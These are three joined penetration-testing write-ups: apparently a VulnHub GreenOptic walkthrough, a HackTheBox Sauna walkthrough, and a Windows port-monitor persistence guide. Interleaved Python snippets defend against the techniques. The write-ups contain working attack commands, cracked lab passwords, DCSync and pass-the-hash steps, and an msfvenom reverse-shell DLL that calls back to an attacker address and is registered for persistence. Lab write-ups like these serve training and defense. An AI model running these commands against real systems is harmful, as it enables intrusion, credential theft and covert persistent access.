GreenOptic: 1 Vulnhub Walkthrough


Today we are going to solve another boot2root challenge called "GreenOptic - 1". It is available on VulnHub for penetration-testing practice and can be downloaded from there.
The credit for making this lab goes to Thomas Williams. Let's get started and learn how to break it down.
Level: Hard
Penetration Testing Methodology
Reconnaissance
§  Netdiscover
§  Nmap
Enumeration
§  Gobuster
Exploiting
§  Local File Inclusion Vulnerability (LFI)
§  John The Ripper
§  Wireshark
Privilege Escalation
§  Credential theft with network forensics
§  Abuse of Wireshark group
§  Capture the flag
Walkthrough
Reconnaissance
We locate the machine's IP address with netdiscover.

netdiscover



So, let's start by running nmap against all ports, with OS detection, version detection, default scripts and traceroute enabled (-A).
nmap -A -p- 192.168.10.160


Enumeration

We access the website and, by visiting its different sections, we can collect the first and last names of the CEO and other employees.



We open the web service on port 10000 and it redirects us to a URL built from the machine's hostname, websrv01.greenoptic.vm, which we cannot resolve yet.

We add that name to our "/etc/hosts" file, pointing it at 192.168.10.160:


We open websrv01.greenoptic.vm:10000 and find a "Webmin" control panel. Although it looks interesting, we will not pursue it for now.



We use Gobuster to investigate the first website further and find a directory called "account".



We access it and find a login form, but the "?include=cookiewarning" parameter in the URL catches our attention.



Changing "cookiewarning" to "../../../../../../../etc/passwd" returns the contents of /etc/passwd, which shows that the application is vulnerable to LFI (Local File Inclusion).
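As an added illustration (not code from the walkthrough or from the GreenOptic application, whose PHP is not shown), the following Python contrasts the path handling that makes this bug possible with a hardened version. It builds a throwaway includes directory, resolves an include name the naive way, and shows that the traversal string used above walks out of the web root, while the hardened resolver rejects it. The directory layout and the cookiewarning file are assumptions made for the demo.

```python
import os
import tempfile

# Constructed throwaway web root with a single legitimate include
# (stands in for the real application's layout, which is an assumption).
ROOT = tempfile.mkdtemp(prefix="lfi-demo-")
INCLUDES = os.path.join(ROOT, "includes")
os.makedirs(INCLUDES)
with open(os.path.join(INCLUDES, "cookiewarning"), "w") as fh:
    fh.write("<div>This site uses cookies.</div>\n")

TRAVERSAL = "../../../../../../../etc/passwd"  # the string sent in ?include=


def resolve_naive(name):
    """What the vulnerable page effectively does: join the user-supplied
    name onto the includes directory and include whatever that names.
    Nothing stops '..' from walking out of the directory."""
    return os.path.normpath(os.path.join(INCLUDES, name))


def resolve_safe(name):
    """Hardened resolver: canonicalise the candidate path (realpath also
    follows symlinks), then insist it still lies inside INCLUDES and names
    a regular file.  An explicit allow-list of include names is simpler
    still and is what you would deploy in practice."""
    base = os.path.realpath(INCLUDES) + os.sep
    candidate = os.path.realpath(os.path.join(INCLUDES, name))
    if not candidate.startswith(base):
        raise ValueError("include escapes the includes directory: %r" % name)
    if not os.path.isfile(candidate):
        raise ValueError("no such include: %r" % name)
    return candidate


def escapes_root(path):
    """True when a resolved path lies outside the web root."""
    return not os.path.realpath(path).startswith(os.path.realpath(ROOT) + os.sep)


def safe_rejects(name):
    """Convenience for checking the hardened resolver's verdict."""
    try:
        resolve_safe(name)
    except ValueError:
        return True
    return False
```

The containment check must run on the canonical path, after `..` segments and symlinks have been collapsed; checking the raw string for `..` is easy to bypass with encodings and nested forms.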



Exploiting

Querying the machine's DNS service with "dig", we list a subdomain called "recoveryplan.greenoptic.vm". Strange, isn't it? A company that actually has a backup plan!



We add this subdomain to "/etc/hosts" and open it in the browser.
It asks for HTTP authentication; guessing credentials gets us nowhere.



This kind of authentication is backed by an ".htpasswd" file. Using the LFI vulnerability found above, we can read that file and recover the hashed credentials.



Using John the Ripper with the "rockyou" wordlist, we crack the hash and recover the plaintext password.
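Before handing a recovered .htpasswd to John, it helps to know what the hash actually is, since that decides the cracking mode and how fast it will go. The following Python is added here and is not part of the walkthrough: it parses htpasswd lines, identifies the hash scheme from its prefix and, for the simplest scheme ({SHA}, base64 of an unsalted SHA-1), checks candidates offline without a cracker at all. The sample file and wordlist are constructed; the mode numbers quoted are hashcat's, and the John format names are ones I am confident of, so verify them against your own build with john --list=formats.

```python
import base64
import hashlib
import hmac
import re

# Hash scheme by prefix, with the cracker mode to use for each.
SCHEMES = [
    (re.compile(r"^\$apr1\$"),           "Apache apr1 MD5 (john md5crypt, hashcat -m 1600)"),
    (re.compile(r"^\$2[aby]\$"),         "bcrypt (john bcrypt, hashcat -m 3200)"),
    (re.compile(r"^\{SHA\}"),            "unsalted SHA-1, base64 (hashcat -m 101)"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "traditional DES crypt (hashcat -m 1500)"),
]


def parse_htpasswd(text):
    """Return [(user, hash)] for every 'user:hash' line, skipping comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        entries.append((user, digest))
    return entries


def identify(digest):
    """Name the hashing scheme used by one htpasswd entry."""
    for pattern, label in SCHEMES:
        if pattern.search(digest):
            return label
    return "unknown"


def sha_entry(password):
    """Produce the {SHA} form that htpasswd -s writes: base64(SHA-1(password))."""
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def crack_sha(entries, wordlist):
    """Try each wordlist entry against every {SHA} hash; returns {user: password}."""
    found = {}
    for user, digest in entries:
        if not digest.startswith("{SHA}"):
            continue  # salted or slow schemes: leave those to John
        for candidate in wordlist:
            if hmac.compare_digest(sha_entry(candidate), digest):
                found[user] = candidate
                break
    return found


# Constructed sample; it is not the file recovered from GreenOptic.
SAMPLE = "\n".join([
    "# backup area users",
    "backup:" + sha_entry("summer2020"),
    "admin:$apr1$c0ffee11$" + "A" * 22,   # placeholder apr1 body, not a real hash
    "legacy:vfSfcH7sZKpjs",                # placeholder 13-char DES crypt string
])
```

An unsalted {SHA} entry falls in seconds to a wordlist; apr1 and especially bcrypt are deliberately slow, so if the file mixes schemes, start with the cheap ones.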



We use the credentials to access the "phpBB" forum and read an administrator's post, which attaches a ".zip" file said to contain "juicy" information.
The post also mentions that "dpi.zip" is password protected and that the password has been sent to "Sam".



Again we use the LFI vulnerability, this time to read Sam's mailbox on the server, and obtain the password needed to unzip "dpi.zip".



Inside is "dpi.pcap". Opening it in Wireshark and following the FTP control stream (FTP sends USER and PASS in clear text; the display filter ftp.request.command == "PASS" finds it directly), we find the FTP credentials of the user "Alex".



We log in via FTP and read the file "user.txt".
It suggests trying the same credentials over SSH; we connect through SSH and get a shell on the machine.


Privilege Escalation (root)

We check the files and binaries we have access to and review privileges and permissions (sudo, SUID, capabilities); the only interesting thing is that our user belongs to the "wireshark" group. On Debian-based systems that group is allowed to run dumpcap, which carries the capture capabilities, so members can sniff traffic without being root.
We open Wireshark, capture on all interfaces and see an authentication attempt that repeats frequently. Inspecting the packet in question, we find credentials encoded in base64.



We decode these credentials (the password is ASfojoj2eozxczzmedlmedASASDKoj3o), authenticate as "root" and read the flag.
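Both credential finds in this box, Alex's FTP login in dpi.pcap and root's base64-encoded login seen while sniffing, come from protocols that put secrets on the wire in the clear. As an added example (not part of the walkthrough and not the real captures), here is a small Python parser that reads a classic pcap file, walks the Ethernet/IPv4/TCP headers without any third-party library, and pulls out FTP USER/PASS pairs and HTTP Basic Authorization headers. The capture it processes is constructed inline; addresses, ports and credentials are invented for the demo.

```python
import base64
import struct

LINKTYPE_ETHERNET = 1


def _frame(src, dst, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame (constructed test traffic;
    checksums are left zero, which the parser does not verify)."""
    eth = b"\x00" * 12 + b"\x08\x00"                     # dst MAC, src MAC, EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap (magic 0xA1B2C3D4)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", 1600000000 + i, 0, len(f), len(f)) + f)
    return b"".join(out)


def iter_tcp(pcap):
    """Yield (src, dst, sport, dport, payload) for each IPv4/TCP packet."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"         # big-endian files read as 0xD4C3B2A1
    linktype = struct.unpack_from(endian + "I", pcap, 20)[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        incl = struct.unpack_from(endian + "IIII", pcap, off)[2]
        off += 16
        frame = pcap[off:off + incl]
        off += incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4
        if frame[14 + 9] != 6:                              # not TCP
            continue
        total = struct.unpack_from("!H", frame, 16)[0]
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:14 + total]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        yield src, dst, sport, dport, tcp[(tcp[12] >> 4) * 4:]


def extract_credentials(pcap):
    """Return (protocol, server, user, password) tuples found in a capture."""
    creds, ftp_user = [], {}
    for src, dst, sport, dport, payload in iter_tcp(pcap):
        for line in payload.decode("latin-1").splitlines():
            if dport == 21 and line.startswith("USER "):
                ftp_user[(src, dst)] = line[5:].strip()     # remember until PASS arrives
            elif dport == 21 and line.startswith("PASS "):
                creds.append(("ftp", dst, ftp_user.get((src, dst), "?"), line[5:].strip()))
            elif dport in (80, 8080) and line.lower().startswith("authorization: basic "):
                user, _, pw = base64.b64decode(line.split(None, 2)[2]).decode("latin-1").partition(":")
                creds.append(("http-basic", dst, user, pw))
    return creds


# Constructed capture: an FTP login followed by an HTTP request carrying Basic auth.
SAMPLE_PCAP = build_pcap([
    _frame("10.0.0.5", "10.0.0.10", 40000, 21, b"USER alex\r\n"),
    _frame("10.0.0.10", "10.0.0.5", 21, 40000, b"331 Please specify the password.\r\n"),
    _frame("10.0.0.5", "10.0.0.10", 40000, 21, b"PASS Sample-ftp-pw\r\n"),
    _frame("10.0.0.5", "10.0.0.10", 40001, 80,
           b"GET /status HTTP/1.1\r\nHost: 10.0.0.10\r\nAuthorization: Basic "
           + base64.b64encode(b"root:Sample-root-pw") + b"\r\n\r\n"),
])
```

To run it over a real file, read it in binary and pass the bytes to extract_credentials. The parser ignores TCP reassembly, so a USER or PASS line split across segments would be missed; for anything beyond a quick triage, let Wireshark or tshark do the reassembly.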

HackTheBox Sauna Walkthrough

Introduction

Today we are going to solve a HTB machine named Sauna. Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation.

The credit for making this lab goes to egotisticalSW.

Level: Easy

Penetration Testing Methodology:

·      Recon

o   Nmap

·      Enumeration

o   Web application

o   username-anarchy

·      Exploitation (Initial Access)

o   AS-REP Roasting

o   john the ripper

o   evil-winrm

·      Privilege Escalation

o   winPEASx64.exe

o   bloodhound-python

o   DCSync

o   mimikatz.exe

o   impacket-secretsdump

o   Pass The Hash

o   Capture the Flag

 

Walkthrough

Recon

We start the enumeration with a port and service scan using nmap.

nmap -sV 10.129.128.245

The nmap results reveal the domain name EGOTISTICAL-BANK.LOCAL.



Enumeration

At port 80, there is a website running in which there is an About Us page containing the list of team members.



To build a list of candidate usernames from the About Us page, we use the username-anarchy tool, which can be downloaded from: https://github.com/urbanadventurer/username-anarchy

We also create a username.txt file containing the full names of all the team members, one per line.



Feeding username.txt to username-anarchy generates users.txt, which contains each name in the first, last, first.last and flast formats.

./username-anarchy --input-file username.txt --select-format first,last,first.last,flast > users.txt



Before starting any exploitation, we add a host entry to /etc/hosts mapping the domain name EGOTISTICAL-BANK.LOCAL to the target IP.



Exploitation

During enumeration it was observed that port 88, the Kerberos service port, is open. Attacks against Kerberos are summarised in this article: https://viperone.gitbook.io/pentest-everything/everything/ports/port-88-or-kerberos

So, AS-REP roasting can be tried here.

AS-REP roasting targets accounts that have the "Do not require Kerberos preauthentication" property set. For such an account the KDC answers an AS-REQ without any proof of the password, and part of the AS-REP is encrypted with a key derived from the user's password, so that material can be taken offline and cracked.

Since we already have a list of users and the Kerberos service is reachable, we use the impacket-GetNPUsers script from Kali. Run without credentials against a user list, it also tells us which of the guessed usernames exist, because the KDC answers differently for unknown principals.

impacket-GetNPUsers -dc-ip 10.129.128.245 EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt

It can be seen that the hash of the fsmith user is obtained after a successful AS-REP roasting attack.

Copying the obtained hash into a file named hashes.



Cracking the above obtained hash using john the ripper tool.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

It can be seen that the password for the fsmith user is Thestrokes23.



Initial Access

Initial access is obtained by logging into the target over WinRM with evil-winrm.

evil-winrm -i 10.129.128.245 -u fsmith -p Thestrokes23



Privilege Escalation

To look for privilege escalation paths, winPEASx64.exe is transferred to the target using evil-winrm's upload command.

We run winPEASx64.exe after it has been transferred.

The winPEAS output shows a set of stored credentials for the domain user svc_loanmanager: Moneymakestheworldgoround!.



No account named svc_loanmanager can be used, but the domain has a similarly named account, svc_loanmgr, and trying the same password against it works. To enumerate further, BloodHound can be used to map Active Directory rights and permissions.

An overview of the Active Directory structure is collected with the bloodhound-python script. The following command generates .json files that can later be imported into BloodHound (backed by a neo4j database) for analysis; -ns points the collector at the DC for DNS, since it needs to resolve the domain, and -c All requests every collection method.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.129.128.245 -d EGOTISTICAL-BANK.LOCAL -c All



Starting the neo4j as console application,


 

Running the bloodhound and importing all the .json files.



BloodHound shows that the svc_loanmgr user has DCSync rights on the domain, that is, the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object. With those rights a principal can ask the domain controller to replicate directory data the way another DC would, including every account's password hashes, so a DCSync attack can be performed.
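To see which principals can DCSync without clicking through the BloodHound GUI, the collector's JSON can be queried directly. The following Python is an added example, not part of the walkthrough or of BloodHound itself; it follows the layout of the bloodhound-python v4 output as I understand it (an Aces list on each domain object with PrincipalSID and RightName, and SID-to-name lookups via users.json and groups.json), which is an assumption to check against your own files. A principal needs both GetChanges and GetChangesAll on the domain object to DCSync. The sample data is constructed and the SIDs are invented.

```python
import json

# Both replication rights are needed on the domain object to DCSync.
DCSYNC_RIGHTS = {"GetChanges", "GetChangesAll"}


def load_names(*json_blobs):
    """Map ObjectIdentifier (SID) -> Properties.name from users.json / groups.json."""
    names = {}
    for blob in json_blobs:
        for obj in json.loads(blob)["data"]:
            names[obj["ObjectIdentifier"]] = obj["Properties"]["name"]
    return names


def find_dcsync(domains_blob, names):
    """Return {principal name: sorted rights} for principals holding both
    replication rights on any domain object listed in domains.json."""
    held = {}
    for domain in json.loads(domains_blob)["data"]:
        for ace in domain.get("Aces", []):
            if ace.get("RightName") in DCSYNC_RIGHTS:
                held.setdefault(ace["PrincipalSID"], set()).add(ace["RightName"])
    return {names.get(sid, sid): sorted(rights)
            for sid, rights in held.items() if rights >= DCSYNC_RIGHTS}


# Constructed sample in the collector's shape; SIDs and the extra ACE are invented.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
USERS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": DOMAIN_SID + "-1108",
     "Properties": {"name": "SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL"}},
    {"ObjectIdentifier": DOMAIN_SID + "-1105",
     "Properties": {"name": "FSMITH@EGOTISTICAL-BANK.LOCAL"}},
], "meta": {"type": "users", "count": 2, "version": 4}})
GROUPS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": DOMAIN_SID + "-512",
     "Properties": {"name": "DOMAIN ADMINS@EGOTISTICAL-BANK.LOCAL"}},
], "meta": {"type": "groups", "count": 1, "version": 4}})
DOMAINS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": DOMAIN_SID,
     "Properties": {"name": "EGOTISTICAL-BANK.LOCAL"},
     "Aces": [
         {"PrincipalSID": DOMAIN_SID + "-512", "PrincipalType": "Group",
          "RightName": "GetChanges", "IsInherited": False},
         {"PrincipalSID": DOMAIN_SID + "-512", "PrincipalType": "Group",
          "RightName": "GetChangesAll", "IsInherited": False},
         {"PrincipalSID": DOMAIN_SID + "-1108", "PrincipalType": "User",
          "RightName": "GetChanges", "IsInherited": False},
         {"PrincipalSID": DOMAIN_SID + "-1108", "PrincipalType": "User",
          "RightName": "GetChangesAll", "IsInherited": False},
         {"PrincipalSID": DOMAIN_SID + "-1105", "PrincipalType": "User",
          "RightName": "GetChanges", "IsInherited": False},   # only one right: not DCSync
     ]},
], "meta": {"type": "domains", "count": 1, "version": 4}})


def report():
    """Run the check over the constructed sample."""
    return find_dcsync(DOMAINS_JSON, load_names(USERS_JSON, GROUPS_JSON))
```

Domain Admins showing up is expected; any other principal in the result is the finding. The check only looks at the replication rights themselves: GenericAll, WriteDacl or WriteOwner on the domain object also lead to DCSync (by granting those rights first) and would need a separate query.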



The credentials can be dumped with mimikatz.exe or with the impacket-secretsdump script. Here we will use both methods, starting with mimikatz.exe.

After mimikatz.exe has been transferred, we run the following command:

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

This dumps the NTLM hash of the Administrator user.



The same NTLM hash can be obtained remotely with the impacket-secretsdump script, without uploading anything to the target.

The following command dumps the hash (it prompts for svc_loanmgr's password):

impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.128.245 -just-dc-user Administrator



Finally, the obtained hash can be used to log into the target as Administrator with a Pass-the-Hash attack.

evil-winrm supports this directly: pass the NT hash with its -H option in place of a password, and a shell as Administrator is obtained.



 

Windows Persistence: Port Monitors


Adversaries may use port monitors to run an attacker-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be registered through the AddMonitor API call, which records a DLL to be loaded at startup; the same registration can be made directly in the registry under HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The DLL is placed in C:\Windows\System32 and is loaded by the print spooler service, spoolsv.exe, on boot. Because spoolsv.exe runs as SYSTEM, the DLL executes with SYSTEM privileges.
MITRE ID: T1547.010
Sub-technique of: T1547
Let's check this out and try to perform the attack.
Generate DLL Payload
To set up the DLL persistence, first generate a malicious DLL payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f dll > raj.dll


Inject DLL Payload
Now upload the malicious DLL into C:\Windows\System32 on the victim through a meterpreter session that runs with administrator privileges, then add a registry key that registers it as a port monitor (the Driver value names the DLL; the key name, here ignite, is arbitrary):
upload /root/raj.dll C:\\Windows\\System32\\raj.dll
reg add "hklm\system\currentcontrolset\control\print\monitors\ignite" /v "Driver" /d "raj.dll" /t REG_SZ
As shown in the image below, the registry key has been created successfully.


Maintain Access
Now, whenever the attacker wants the session back, they start a listener for the reverse connection. As soon as the victim machine reboots, spoolsv.exe loads the registered monitor DLL and the attacker receives a new meterpreter session. The Print Spooler service must be running for this to happen, and because the DLL is loaded into a 64-bit service process on 64-bit Windows, the payload has to be a 64-bit DLL, as generated above.
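The registration above is also exactly what a defender looks for. As an added example (not from the page), the following Python parses the output of reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors" /s and flags any monitor whose Driver value does not match a monitor Windows ships. The known-monitor table is an assumption compiled from a stock install and should be adjusted per build and for legitimately installed printer software; the sample output is constructed to contain the ignite key created above.

```python
import re

# Monitors shipped with Windows and the DLL each should point at
# (assumption from a stock install; extend for your build and printer drivers).
KNOWN_MONITORS = {
    "local port": "localspl.dll",
    "standard tcp/ip port": "tcpmon.dll",
    "usb monitor": "usbmon.dll",
    "wsd port": "wsdmon.dll",
}

KEY_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\(.+)$", re.I)
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_reg_query(text):
    """Turn 'reg query ... /s' output into {subkey path: {value name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        key = KEY_RE.match(line.strip())
        if key:
            current = key.group(1)
            keys[current] = {}
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            keys[current][value.group(1)] = value.group(3).strip()
    return keys


def suspicious_monitors(keys):
    """Return (monitor, dll, reason) for monitor keys that do not match the known table."""
    findings = []
    for name, values in keys.items():
        dll = values.get("Driver")
        if dll is None:                   # nested subkeys such as ...\Ports carry no Driver
            continue
        expected = KNOWN_MONITORS.get(name.lower())
        if expected is None:
            findings.append((name, dll, "monitor not shipped with Windows"))
        elif dll.lower() != expected:
            findings.append((name, dll, "known monitor points at an unexpected DLL"))
    return findings


# Constructed output of: reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors" /s
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port
    Driver    REG_SZ    localspl.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Standard TCP/IP Port
    Driver    REG_SZ    tcpmon.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Standard TCP/IP Port\Ports

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\USB Monitor
    Driver    REG_SZ    usbmon.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\ignite
    Driver    REG_SZ    raj.dll
"""
```

Run the reg query on the host (or against an offline SYSTEM hive with your tool of choice), feed its text to parse_reg_query, and review the findings; the same check is a good candidate for a scheduled baseline comparison, since a new Driver value appearing under that key is rare on a server that does not print.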


Reference: https://attack.mitre.org/techniques/T1547/010/